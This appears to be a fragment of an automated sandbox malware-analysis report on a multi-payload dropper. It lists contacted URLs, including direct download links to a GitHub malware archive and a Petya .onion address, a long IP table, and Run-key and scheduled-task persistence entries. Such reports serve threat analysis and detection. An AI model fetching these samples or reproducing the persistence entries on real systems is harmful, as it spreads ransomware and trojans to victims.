                                                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/MEMZ.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.309190562.000001E5E5A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/WolframAV.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/Spark.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.openssl.org/support/faq.htmlEndermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drfalse
                                                                                                            high
                                                                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/HMBlocker.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacks1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.fonts.comnEndermanch@DeriaLock.exe, 00000013.00000003.327084068.000000000566B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://github.com81jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.fonts.comEndermanch@DeriaLock.exe, 00000013.00000003.327064556.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327123356.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.bplaced.net/css/error.cssEndermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.fonts.comxEndermanch@DeriaLock.exe, 00000013.00000003.327506990.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328383198.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327371501.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328611212.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327774074.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328911134.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329491498.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327882558.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328232925.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327717423.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329149705.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327256329.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328778379.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327324383.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328474289.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329108864.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328029816.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327555439.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://petya37h5tbhyvki.onion/6zoerSEndermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmp, DR012.47.drtrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000002.310722812.000001E5E5A5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.jiyu-kobo.co.jp/jp/Endermanch@DeriaLock.exe, 00000013.00000003.343064878.000000000565E000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.343956115.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://btc.bloEndermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.309107047.000001E5E5A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310693087.000001E5E5A4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://petya37h5tbhyvki.onion/Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmptrue
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://www.torproject.org/download/download-easy.html.enEndermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.309277515.000001E5E5A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/Illerka.C.zip1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.bplaced.net/favicon-16x16.pngEndermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.thawte.com/cps0/Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drfalse
                                                                                                                                          high
                                                                                                                                          http://api.bloEndermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zipOhttps://github.co1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.bplaced.net/favicon-32x32.pngEndermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://activity.windows.comsvchost.exe, 00000003.00000002.554820833.0000026EC783E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.fonts.com=wfEndermanch@DeriaLock.exe, 00000013.00000003.327506990.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328383198.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327371501.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328611212.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327774074.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328911134.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329491498.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327882558.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328232925.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327717423.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329149705.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327256329.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328778379.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327324383.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328474289.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.329108864.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.328029816.0000000005685000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000003.327555439.0000000005685000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                low
                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                87.98.177.219
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.218
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.215
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.214
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.217
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.216
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.211
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.210
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.213
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.212
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.208
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.207
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.209
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.204
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.203
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.206
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.205
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.200
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.202
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.201
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.2
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.1
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.4
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.3
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                172.217.168.14
                                                                                                                                                google.comUnited States
                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                87.98.177.0
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.9
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.6
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.5
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.8
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.7
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.1
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.237
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.2
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.236
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.239
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.0
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.238
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.5
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.233
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.6
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.232
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.3
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.235
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.4
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.234
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.9
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                95.1.200.7
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.231
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                95.1.200.8
                                                                                                                                                unknownTurkey
                                                                                                                                                9121TTNETTRfalse
                                                                                                                                                87.98.177.230
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.249
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.248
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.247
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.246
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.97
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.96
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.99
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.98
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.241
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.93
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.240
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.92
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.95
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.94
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.245
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.244
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.243
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.91
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.242
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.90
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.229
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.226
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.225
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.228
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.227
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.222
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.221
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.224
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.223
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.177.220
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.252
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.251
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.250
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.255
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.254
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.253
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                93.107.12.20
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.21
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.22
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.23
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.24
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.25
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.26
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.27
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.28
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                93.107.12.29
                                                                                                                                                unknownIreland
                                                                                                                                                15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                87.98.178.227
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.179.79
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                87.98.178.226
                                                                                                                                                unknownFrance
                                                                                                                                                16276OVHFRfalse
                                                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                Analysis ID:712615
                                                                                                                                                Start date and time:2022-09-29 14:47:10 +02:00
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 14m 13s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:1jDe7zWnoe.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:67
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.rans.spre.troj.spyw.expl.evad.winEXE@112/191@20/100
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 98.5% (good quality ratio 94.6%)
                                                                                                                                                • Quality average: 82.7%
                                                                                                                                                • Quality standard deviation: 26.6%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                • Number of executed functions: 118
                                                                                                                                                • Number of non-executed functions: 89
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Connection to analysis system has been lost, crash info: Unknown
                                                                                                                                                • Exclude process from analysis (whitelisted): Conhost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): collect.installeranalytics.com, fs.microsoft.com, yandex.ru, recoverpcerror.com, google.ru, www.vikingwebscanner.com, watson.telemetry.microsoft.com, itsupport24by7.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                TimeTypeDescription
                                                                                                                                                14:48:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe
                                                                                                                                                14:48:38Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 2112656973 &amp;&amp; exit
                                                                                                                                                14:48:40API Interceptor1x Sleep call for process: Endermanch@Cerber5.exe modified
                                                                                                                                                14:48:42API Interceptor31x Sleep call for process: rundll32.exe modified
                                                                                                                                                14:48:58AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\WINDOWS\Web\rundll32.exe
                                                                                                                                                14:49:15API Interceptor1x Sleep call for process: Fantom.exe modified
                                                                                                                                                14:49:25AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AVPCC C:\WINDOWS\Cursors\avp.exe
                                                                                                                                                14:49:34API Interceptor13x Sleep call for process: LOAcQQUU.exe modified
                                                                                                                                                14:49:50Task SchedulerRun new task: sys path: C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
                                                                                                                                                14:49:52AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run LOAcQQUU.exe C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
                                                                                                                                                14:50:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe
                                                                                                                                                14:50:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem "C:\ProgramData\Windows\csrss.exe"
                                                                                                                                                No context
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                github.com4W5dQXszUV.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                05dfb699.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                a29b4832.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                UIvwi4Oprs.jarGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                6IXn8C3LvN.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                fPMt63h1Bx.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                8DjKJy19fW.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                X3VTSsbYNU.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                4c4Dt7ag0O.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                VyyuC2FGJI.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
                                                                                                                                                wvzo8Sq723.exeGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.4
                                                                                                                                                SHIPMENT DOCUMENTS#CUSTOMS.PDF.jarGet hashmaliciousBrowse
                                                                                                                                                • 140.82.121.3
